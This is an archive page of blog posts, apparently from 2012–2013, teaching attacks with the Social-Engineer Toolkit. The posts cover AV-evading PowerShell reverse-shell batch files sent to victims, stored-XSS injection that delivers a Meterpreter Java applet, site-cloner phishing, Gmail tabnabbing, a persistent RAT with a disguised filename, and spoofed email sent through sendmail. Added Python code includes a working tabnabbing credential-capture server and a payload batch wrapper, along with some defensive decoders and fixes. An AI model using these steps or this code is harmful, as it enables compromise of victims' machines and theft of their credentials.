
Showing posts with label S.E.T.. Show all posts

Tuesday, August 20, 2013

Bypass AV using the PowerShell method with a batch file

In penetration testing the first step is bypassing AV and making the payload as hard to detect as possible ("FUD", fully undetectable, in the usual jargon). Previously we saw that we can bypass AV using Veil; there we used the Python module. Veil offers four payload types: C, C#, PowerShell and Python. Today we use the PowerShell module.

If you are not familiar with PowerShell, look it up; it is the Windows scripting language, comparable to bash on Linux. At the time most AV products did not detect this payload: it is script text handed to the signed powershell.exe, and the shellcode is injected in memory, so no executable is written to disk for the scanner to inspect. We use the SET PowerShell module to bypass AV; you can also use the Veil module.

cd  /pentest/exploits/set/
./setoolkit

Type 1, Social-Engineering Attacks.
After that, type 10, Powershell Attack Vectors.

(Figure: powershell-module)

Then give your IP and port for the reverse shell to connect back to.

As the figure shows, the payload has been generated and stored in /root/.set/reports/powershell, and a Metasploit listener has been started. If the victim pastes the generated one-liner into cmd, we get a Meterpreter shell. But it is hard to convince someone to copy something and paste it into cmd, so we will wrap the payload in a batch file.

Create a batch file from the payload


(1) Open x86_powershell_injection.txt from /root/.set/reports/powershell.
(2) Prepend the full path of powershell.exe on the first line. The generated line starts with the word powershell; put C:\Windows\System32\WindowsPowerShell\v1.0\ directly in front of it, so the batch file does not depend on the victim's PATH.
(3) To hide the command text while it runs, put @echo off as the first line of the script.
(4) Copy all the code from x86_powershell_injection.txt.
(5) Create a new file and paste the code.
(6) Save the file with a .bat extension and send it to the victim.

As soon as the victim opens the file, we get a shell.
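Steps (1) to (6) as a script, added here as an example (not code from the post or from SET): it wraps the SET one-liner into a .bat with the full powershell.exe path and @echo off, and, for the defender's side, decodes the -EncodedCommand blob back into readable script. The sample line is constructed for the example and only echoes a string; a real SET line carries shellcode. The path constant is an assumption for a default Windows install.

```python
import base64
import re
from pathlib import Path

# Absolute path of powershell.exe, so the batch file does not rely on PATH
# (assumed default location on a standard Windows install).
POWERSHELL_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed stand-in for the one-liner SET writes to x86_powershell_injection.txt.
# A real SET line carries shellcode; this one only echoes a string so the example
# runs harmlessly and offline. The -enc argument is base64 of the UTF-16LE script,
# which is what PowerShell's -EncodedCommand expects.
SAMPLE_SCRIPT = "Write-Output 'hello from the batch wrapper'"
SAMPLE_SET_LINE = (
    "powershell -nop -windowstyle hidden -noni -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# Matches the common spellings of -EncodedCommand and captures the base64 blob.
ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def build_batch(set_line: str, hide_echo: bool = True) -> str:
    """Steps (2) and (3) of the post: give the batch file the full path to
    powershell.exe and optionally hide the command text with @echo off."""
    line = set_line.strip()
    if not line.lower().startswith("powershell"):
        raise ValueError("expected the SET line to start with 'powershell'")
    rest = line[len("powershell"):]
    if rest.lower().startswith(".exe"):
        rest = rest[len(".exe"):]
    lines = ["@echo off"] if hide_echo else []
    lines.append(f'"{POWERSHELL_EXE}"{rest}')
    return "\r\n".join(lines) + "\r\n"  # cmd.exe wants CRLF line endings


def decode_encoded_command(set_line: str) -> str:
    """Defender's view: the 'FUD' payload is only hidden behind base64/UTF-16LE,
    so an analyst (or an AV emulator) reads the script back in one step."""
    m = ENC_RE.search(set_line)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def write_batch(set_line: str, out_path: str) -> Path:
    """Steps (4) to (6): write the wrapper out as a .bat file."""
    p = Path(out_path)
    p.write_bytes(build_batch(set_line).encode("utf-8"))
    return p


if __name__ == "__main__":
    print(build_batch(SAMPLE_SET_LINE))
    print("decoded:", decode_encoded_command(SAMPLE_SET_LINE))
```

The decoder is the check to keep in mind before calling anything "FUD": the batch file hides nothing from a reader with base64 and a UTF-16 decoder, and command-line logging on the target (PowerShell script block logging, Sysmon) records exactly this line.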

Sunday, July 21, 2013

How to solve the Metasploit problem in SET?


If you installed Metasploit from the git repository, SET works without problems. But if you installed Metasploit from its binary installer, then when you try to run a SET attack that uses Metasploit you may get an error about a Ruby bundle, because the binary installer ships its own Ruby and gem set, separate from the system Ruby that SET calls. Here is the solution. I tested it on SET version 5.2.1 and Metasploit v4.6.2-1.

We are going to install Ruby 1.9.3 using RVM. Run all of the following commands inside the msf3 folder.

root@bt:~# cd /opt/metasploit/apps/pro/msf3/

root@bt:/opt/metasploit/apps/pro/msf3# bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) 
 
root@bt:/opt/metasploit/apps/pro/msf3# source /etc/profile.d/rvm.sh
 
root@bt:/opt/metasploit/apps/pro/msf3# rvm -v 

Once RVM is up and running we need a couple of libraries required by the Ruby build:
root@bt:/opt/metasploit/apps/pro/msf3# for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done 

And finally the Ruby 1.9.3 runtime: 

root@bt:/opt/metasploit/apps/pro/msf3# rvm install 1.9.3
root@bt:/opt/metasploit/apps/pro/msf3# rvm 1.9.3 --default
root@bt:/opt/metasploit/apps/pro/msf3# ruby -v
root@bt:/opt/metasploit/apps/pro/msf3# gem install bundler
root@bt:/opt/metasploit/apps/pro/msf3# bundle install

Now open SET from its path; before running SET, type the commands below:
cd /pentest/exploits/set

source /etc/profile.d/rvm.sh

rvm 1.9.3 --default

./se-toolkit

Now you can use any Metasploit attack from SET.

Wednesday, January 16, 2013

How to exploit stored XSS using S.E.T.?


Stored XSS is the most dangerous type of cross-site scripting, because a user is exploited simply by visiting the page where the vulnerability occurs. If that user happens to be the administrator of the website, it can lead to compromise of the whole web application, which is one reason the risk is higher than with reflected XSS.

(1) First, I recommend reading "How to find XSS in a website?" here.

(2) Open a terminal and type the following:
sudo bash
cd /opt/set
./set
(3) Now select option 1, Social-Engineering Attacks.
(4) Select option 2, Website Attack Vectors.
(5) Select option 3, the Java Applet Attack Method.
(6) Select option 1, Web Templates.
(7) Select option 1, Java Required.
(8) Now we select the payload and encoder: the simple Windows Reverse_TCP Meterpreter with shikata_ga_nai encoding.
(9) Set the listener port to 443. Metasploit now starts.
(10) Now we go back to the web application and insert the malicious JavaScript into the comment field that we already know is vulnerable to stored XSS. The script has to send every visiting browser to the page SET is serving on our IP; that is what makes the applet prompt appear.

(Figure: injecting the script into the vulnerable comment field)
(11) When a user accesses the page that contains the malicious JavaScript, the code executes in his browser and a new window appears containing the following message:

(Figure: the message shown to the user)

(12) After a moment the user sees a pop-up box asking whether he wants to run the Java applet.

(Figure: the Java applet run prompt)

(13) If the user presses Run, the malicious code executes and returns us a shell.
(14) sessions -i 1
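The comment field the attack relies on, as an added example (not code from the post or from SET): a Python sketch of the vulnerable rendering beside the fixed one, with a constructed set of comments in which the last one carries a window.open payload pointing at an assumed attacker address (192.0.2.10, a documentation address, not taken from the post). The same check that shows the script surviving in the vulnerable output is what you run against a candidate field when looking for the stored XSS in the first place.

```python
import html
import re

# Assumed attacker address where SET would be serving the applet page.
ATTACKER_URL = "http://192.0.2.10/"

# Constructed comments standing in for a comment table. The last one is the kind
# of payload step (10) plants: it opens the attacker's page in a new window.
COMMENTS = [
    ("alice", "Nice article, thanks!"),
    ("bob", "Does this work on Windows 8?"),
    ("mallory", f'<script>window.open("{ATTACKER_URL}")</script>'),
]


def render_comments_vulnerable(comments):
    """The flaw: user-supplied text is concatenated straight into the HTML,
    so anything a commenter typed is interpreted as markup by every visitor."""
    rows = [f"<p><b>{who}</b>: {text}</p>" for who, text in comments]
    return "<div id='comments'>" + "".join(rows) + "</div>"


def render_comments_fixed(comments):
    """Fix: encode each untrusted value for the HTML text context it lands in.
    quote=True also encodes quotes, which matters if a value ends up in an attribute."""
    rows = [
        f"<p><b>{html.escape(who, quote=True)}</b>: {html.escape(text, quote=True)}</p>"
        for who, text in comments
    ]
    return "<div id='comments'>" + "".join(rows) + "</div>"


SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def active_content_present(page: str) -> bool:
    """Cheap check on a rendered page: did a <script> tag survive rendering?
    True means the field is injectable (or, after the fix, that the fix failed)."""
    return SCRIPT_RE.search(page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_comments_vulnerable), ("fixed", render_comments_fixed)):
        page = render(COMMENTS)
        print(f"{name}: script survives = {active_content_present(page)}")
        print(page)
```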

Thursday, January 10, 2013

Bypass Antivirus using S.E.T

Bypass antivirus using the Multi PyInjector shellcode injection in SET with Metasploit.

Requirement:-


Victim's OS: Windows.

Attacker: S.E.T., Metasploit.

(1) Open a terminal and type the following commands:

sudo bash

cd /opt/set

./set

(2) Now select option 1, Social-Engineering Attacks.

(3) Select option 2, Website Attack Vectors.

(4) Now choose option 1, the Java Applet Attack Method.

(5) Now choose option 2, "Site Cloner".

(6) Enter the URL to clone: http://www.google.com (you can use any website to host the Java applet).

(7) Now choose 16, "Multi PyInjector Shellcode Injection".

(8) Enter the port on the attacker computer. In this example I use port 443.

(9) Select the payload you want to deliver via shellcodeexec: press Enter to accept the default.

(10) Now enter the ports for the additional injected payloads. In this example I use ports 444 and 445.

(11) Select the payload you want to deliver via shellcodeexec: press Enter again.

(12) Send your IP to the victim. As soon as he opens the link and runs the Java applet, you have access to the victim's PC.

(13) sessions -l

(14) sessions -i <id>

Friday, January 4, 2013

How to move S.E.T. to Github?

The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially moved to GitHub. GitHub provides a much faster platform for getting releases up and a more efficient method for obtaining new SET releases.

All you need to do to go from the current version to git is an svn update in the set directory followed by the automatic installer. Once pulled through GitHub, SET updates come from the GitHub repositories instead of svn. The subversion repos will remain active for a couple of months.

How to move S.E.T. to Github?


1. Manual

2. Automatic

How to install S.E.T. manually?

The extra packages needed to use SET effectively are as follows.

(1) Metasploit: see my old post about how to install Metasploit in Ubuntu here.

(2) Ettercap: if you are on a network and want to run network attacks such as Man-in-the-Middle or DNS poisoning, you need it.

To install Ettercap, open a terminal and type the following command:

sudo apt-get install ettercap

(3) OpenJDK 6: required by SET (the Java applet attacks need it). Type the following command in a terminal:

sudo apt-get install openjdk-6-jdk

Then clone SET from GitHub and start it:

git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
./setoolkit

Whenever you need updates, just run the update tool or type git pull. In addition to the move to git, the installer has been updated to support OSX installations. This update puts SET at version 4.3.4.

How to install S.E.T. automatically?


In this method we assume that you already have SET installed from svn; the new version has moved to GitHub, and SET itself offers to do the conversion.

cd /pentest/exploits/set
svn update
./set

[-] New set_config.py file generated on: 2013-01-04 10:54:25.898164
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164
[*] SET is using the new config, no need to restart
[!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN.
[!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you.
[!] Do you want to do a manual install or have SET do the conversion to GIT for you?

1. Automatic
2. Manual
3. Continue using SET (NO UPDATES ANYMORE!)


Enter your numeric choice: 1
[*] BEFORE YOU START! Ensure you have GIT installed (apt-get install git)
Have you installed GIT? y/n: y
[*] Great! Here we go... Removing old svn repository and moving to new
[*] SET directory has been removed. Now checking out SET from GIT..
[*] This could take a few moments..
Cloning into /opt/set...
remote: Counting objects: 403, done.
remote: Compressing objects: 100% (323/323), done.
remote: Total 403 (delta 81), reused 392 (delta 70)
Receiving objects: 100% (403/403), 35.81 MiB | 1.45 MiB/s, done.
Resolving deltas: 100% (81/81), done.
[*] You should now have the latest from git. To update, run set-update or type git pull
[*] Exit SET and restart. Move out of the current directory and go into the set directory.
[*] You should never have to go through this process again!

====How to Update====

(You may use either ./set-update or git pull, as advised above.)

root@LM:/opt/set# ./set-update
[-] Updating the Social-Engineer Toolkit, be patient...
Already up-to-date.

[*] The updating has finished, returning to main menu..
root@LM:/opt/set# git pull
Already up-to-date.

==== STEP 2====

# If you come across this error message:

root@LM:/opt/set# ./set
[!] Metasploit path not found. These payloads will be disabled.
[!] Please configure in the config/set_config.

# Just press Enter to continue.

# Then the terms of service prompt appears

Do you agree to the terms of service [y/n]: y

# SET opens its main menu; choose 99 to exit SET

set>99

# Edit config/set_config (nano or vim, your choice)

root@LM:/opt/set# nano config/set_config

# In config/set_config, set the path to your own Metasploit directory:

### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/

# Save and exit the editor. Then update Metasploit by choosing 4 in the SET menu.

4) Update the Metasploit Framework

set> 4

# Once updated, you can run SET as normal.

Wednesday, January 2, 2013

Tabnabbing Tutorial

Tabnabbing is a phishing attack that persuades users to submit their login details to what looks like a popular website by impersonating that site. The attack takes advantage of user trust and inattention to detail with regard to tabs, and of the ability of a web page to rewrite its own contents long after it has loaded. Tabnabbing works in reverse of most phishing attacks: it does not ask the user to click an obfuscated link; instead it loads a fake page into one of the tabs already open in the browser.

We cover two methods of tabnabbing.

(1)Manual.

(2)With the help of S.E.T.

Tabnabbing with the help of S.E.T.

(1) Open S.E.T. (you can find how to install and configure SET here).

(2) Select option 1, Social-Engineering Attacks.

(3) Select option 2, Website Attack Vectors.

(4) Now option 4, the Tabnabbing Attack Method.

(5) Select Site Cloner.

(6) Enter the URL of the site (for example, to go after a victim's Gmail account, type gmail.com).

(7) Send a link to your IP to the victim via mail or chat. (You can also spoof the email; see here.)

(8) As soon as he opens the link, he sees the message "please wait while the site is loading."

(9) When the victim switches to another tab, the page replaces itself with your phishing page, which is what he sees when he comes back to the tab.

In the next tutorial we will see the manual method of tabnabbing, because if you have a dynamic IP this method is not very useful: as soon as your IP changes, the link you sent no longer reaches the SET listener, so you cannot capture the victim's password.
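The flow of steps (1) to (9), as an added example (not SET's code): a small Python listener that serves the "please wait" lure, swaps in a stand-in login clone when the tab is hidden, records the POSTed credentials and bounces the victim to the real site. REAL_SITE, the listening port and the shape of the clone form are assumptions for the example; SET's site cloner would serve a copy of the real page instead.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Assumed values (not from the post): the site being impersonated and the bind address.
REAL_SITE = "https://mail.example.com/"
LISTEN_ADDR = ("0.0.0.0", 8080)

LURE_PAGE = """<!doctype html>
<html><head><title>Please wait</title>
<script>
// Tabnabbing: do nothing while the victim is looking at this tab. When the tab
// is hidden (the victim switched to another tab), replace the page with the
// login clone, so the tab looks like a trusted site when they come back.
document.addEventListener('visibilitychange', function () {
  if (document.hidden) { window.location.replace('/clone'); }
});
</script></head>
<body><p>Please wait while the site is loading...</p></body></html>
"""


def build_lure_page() -> str:
    """Step (8): the page the victim sees first."""
    return LURE_PAGE


def build_clone_page() -> str:
    """Stand-in for the cloned login page. The only change the attack needs is
    the form action pointing back at this listener instead of the real site."""
    return (
        "<!doctype html><html><head><title>Sign in</title></head><body>"
        '<form method="post" action="/post">'
        '<input name="user"><input name="pass" type="password">'
        "<button>Sign in</button></form></body></html>"
    )


def parse_credentials(body: bytes) -> dict:
    """What the listener records from the POSTed form (first value per field)."""
    fields = parse_qs(body.decode("utf-8"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


class Listener(BaseHTTPRequestHandler):
    def do_GET(self):
        page = build_clone_page() if self.path == "/clone" else build_lure_page()
        self._send(200, page.encode("utf-8"))

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        creds = parse_credentials(self.rfile.read(length))
        print("[*] captured:", creds)
        # Bounce the victim to the real site so the "failed" login looks like a typo.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()

    def _send(self, code: int, body: bytes):
        self.send_response(code)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    HTTPServer(LISTEN_ADDR, Listener).serve_forever()
```

Run it, open http://<your-ip>:8080/ in a browser, switch to another tab and come back: the tab now shows the clone. The swap here uses the Page Visibility API (visibilitychange and document.hidden) rather than the window blur/focus events of the original technique; the effect is the same, and it is why the attack depends on the victim leaving the tab rather than on any link click.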

Monday, December 24, 2012

How to use a R.A.T. through S.E.T.?

RAT stands for Remote Administration Tool; with a RAT you can control a remote PC. Lots of RAT software is available, but much of it is written by unknown parties, and there is a real possibility of a backdoor in those ready-made tools. So today we use the RAT shipped with the Social-Engineer Toolkit (SET).

(1) Open your terminal and type:

cd /opt/set

./set

(2) Update SET.

(3) Now select option 3, Third Party Modules.

(4) Now select option 2, RATTE (Remote Administration Tool Tommy Edition).

(5) Enter the IP address of your computer for the client to connect back to.

(6) Port RATTE Server should listen on [8080]: press Enter.

(7) Should RATTE be persistent [no|yes]?: yes

(8) Use specific filename (ex. firefox.exe) [filename.exe or empty]?: cool.exe

(9) The payload has been exported to src/program_junk/ratteM.exe.

(10) Now send ratteM.exe to the victim. As soon as they download and open it:

Start the ratteserver listener now [yes|no]: yes

(11) Choose option 1, list clients.

(12) If the payload executed successfully, you will see a new session and the client details. Note the session number. Enter the session you want to interact with: press 0 here.

Now choose option 2, "activate client".

Now you get a menu with many options. Select the first one, start shell.

Friday, December 21, 2012

How to install and configure sendmail in Ubuntu?

Sendmail is a program that lets you send email from the command line; with it your own machine acts as the mail server. I will show you how to install and configure sendmail so we can send mail with a spoofed sender address to targets. The problem is that such mail usually lands in the spam folder, because it comes straight from an unauthenticated home machine rather than from the sender domain's real mail servers.

How to install sendmail?


Open a terminal and type the following commands:

sudo apt-get install mailutils

sudo apt-get install sendmail


How to configure it?


After installing sendmail you need to configure it. It is a little fiddly, but afterwards we can send spoofed mail to anyone.

Type the following command in a terminal:

sudo gedit /etc/mail/sendmail.mc

This opens the sendmail.mc file.

For example, if the last two lines are:

MAILER(`local')dnl
MAILER(`smtp')dnl

put these lines before them. Note the m4 quoting: an opening backtick and a closing single quote. The define() must come before MAILER_DEFINITIONS, and if your sendmail.mc already has a MAILER_DEFINITIONS line, do not add a second one.

define(`SMART_HOST', `smtp.gmail.com')dnl
MAILER_DEFINITIONS

One caveat: smtp.gmail.com only accepts relayed mail on port 587 with STARTTLS and SMTP authentication. With SMART_HOST alone and no authentication configured, Gmail refuses the relay and the message sits in the local queue (check with mailq).

OK, now save and close the file.

Now generate the configuration file from the .mc file by typing the following command in a terminal:

sudo bash -c 'cd /etc/mail/ && m4 sendmail.mc > sendmail.cf'

Then restart sendmail so it reads the new sendmail.cf (sudo service sendmail restart). Now everything is complete; try sending mail from the terminal, or use the Social-Engineer Toolkit as mentioned in a previous post.


How to send mail from the command line?


Open a terminal and type the following, one line at a time (the server's replies are omitted here):

telnet 127.0.0.1 25
HELO server
MAIL FROM:<sender@example.com>
RCPT TO:<recipient@example.com>
DATA
Subject: Test mail
From: sender@example.com
To: recipient@example.com

Test Mail
.
QUIT

Replace sender@example.com with the address you want to show as the sender and recipient@example.com with the real recipient. The blank line after the headers is required (it separates headers from body), and the single dot on a line of its own ends the message.


Now check the receiver's spam folder; the mail is there. Open the "show original" option of the email: in the Received headers you can see the IP address of the sending computer, the sendmail version banner (which gives away the OS) and many other details.
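The "show original" check above, as an added example (not part of the original post): a Python script that parses a constructed raw message, walks the Received chain back to the originating relay, pulls out the HELO name and the sendmail version banner, and flags the two mismatches that give a spoofed sender away. The hostnames, names and message text are made up for the example, and the IP addresses are documentation ranges.

```python
import email
import re

# Constructed example of what Gmail's "show original" displays for a message
# sent from a home sendmail box with the telnet session above. Hosts, names and
# the message are made up; the addresses are RFC 5737 documentation ranges.
RAW_MESSAGE = """\
Delivered-To: victim@example.net
Received: from mx.example.net (mx.example.net. [198.51.100.7])
        by mail.example.net with ESMTPS id abc123
        for <victim@example.net>; Fri, 21 Dec 2012 10:00:05 -0800 (PST)
Received: from attacker-box.localdomain (203-0-113-42.dsl.example.org [203.0.113.42])
        by mx.example.net (8.14.4/8.14.4) with ESMTP id qBLI03xx
        for <victim@example.net>; Fri, 21 Dec 2012 10:00:02 -0800 (PST)
Received: from server (localhost [127.0.0.1])
        by attacker-box.localdomain (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id qBLI00aa
        for victim@example.net; Fri, 21 Dec 2012 10:00:00 -0800
From: ceo@bank.example.com
To: victim@example.net
Subject: Test mail
Message-Id: <201212211800.qBLI00aa@attacker-box.localdomain>

Test Mail
"""

IPV4_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"^from\s+(\S+)")
BANNER_RE = re.compile(r"\bby\s+\S+\s+\(([^)]+)\)")


def received_chain(raw: str) -> list[str]:
    """Received headers in delivery order (origin first). Each relay prepends
    its own header, so the top of the message is the last hop."""
    msg = email.message_from_string(raw)
    return [str(h) for h in reversed(msg.get_all("Received", []))]


def originating_relay(raw: str) -> str:
    """First non-loopback address in the chain: the machine that injected the mail."""
    for hop in received_chain(raw):
        for ip in IPV4_RE.findall(hop):
            if not ip.startswith("127."):
                return ip
    raise ValueError("no originating address found")


def helo_name(raw: str) -> str:
    """What the sender typed after HELO (the post's 'HELO server')."""
    m = HELO_RE.match(received_chain(raw)[0])
    return m.group(1) if m else ""


def mta_banner(raw: str) -> str:
    """Sendmail stamps its version and distro package into the first hop;
    that is where the operating system leaks."""
    m = BANNER_RE.search(received_chain(raw)[0])
    return m.group(1) if m else ""


def spoof_indicators(raw: str) -> list[str]:
    """Two cheap tells: the From domain never handled the message, and the
    Message-Id was minted by a different host than the one From claims."""
    msg = email.message_from_string(raw)
    from_domain = msg["From"].rsplit("@", 1)[-1].strip("<> ").lower()
    mid_domain = msg.get("Message-Id", "").rsplit("@", 1)[-1].strip("<> ").lower()
    chain = " ".join(received_chain(raw)).lower()
    found = []
    if from_domain not in chain:
        found.append(f"From domain {from_domain} never appears in the Received chain")
    if mid_domain and mid_domain != from_domain:
        found.append(f"Message-Id domain {mid_domain} differs from From domain {from_domain}")
    return found


if __name__ == "__main__":
    print("origin:", originating_relay(RAW_MESSAGE))
    print("HELO:", helo_name(RAW_MESSAGE))
    print("MTA:", mta_banner(RAW_MESSAGE))
    for line in spoof_indicators(RAW_MESSAGE):
        print("[!]", line)
```

Read the chain from the bottom up, as the script does: the first hop records the HELO name and the sendmail build, the second records the public address the victim's mail server saw. Nothing in the From header can change either of those, which is why a spoofed From is easy to send and easy to unmask.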

Wednesday, December 19, 2012

How to install the Social Engineering Toolkit (S.E.T.) in Ubuntu?

The Social Engineering Toolkit is a tool that comes with BackTrack and extends what you can do with Metasploit. If you are on a Linux system other than BackTrack, you can install it as follows.

Update: this article was written when S.E.T. used SVN. It has since moved to GitHub, so please click here for the new installation method.

The extra packages needed to use SET effectively are as follows.

(1) Metasploit: see my old post about how to install Metasploit in Ubuntu here.

(2) Ettercap: if you are on a network and want to run network attacks such as Man-in-the-Middle or DNS poisoning, you need it.

To install Ettercap, open a terminal and type the following command:

sudo apt-get install ettercap

(3) OpenJDK 6: required by SET (the Java applet attacks need it). Type the following command in a terminal:

sudo apt-get install openjdk-6-jdk


Now open a terminal and change directory to /opt:

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we configure it. First SET needs the Metasploit path, which goes in the config file. Here a problem comes up: in the first step we installed Metasploit into /opt/metasploit-4.4.0/msf3, but when I put that path in the config file SET could not detect Metasploit. So rename the metasploit-4.4.0 folder to framework3.

Put /opt/framework3/msf3 as the path in the config file and save it. Then type in the terminal:

./set

This opens SET.

In the next tutorial I will show you how to configure sendmail and use it in SET.

I know I cannot explain this well, so if you face any problem please mention it in a comment.
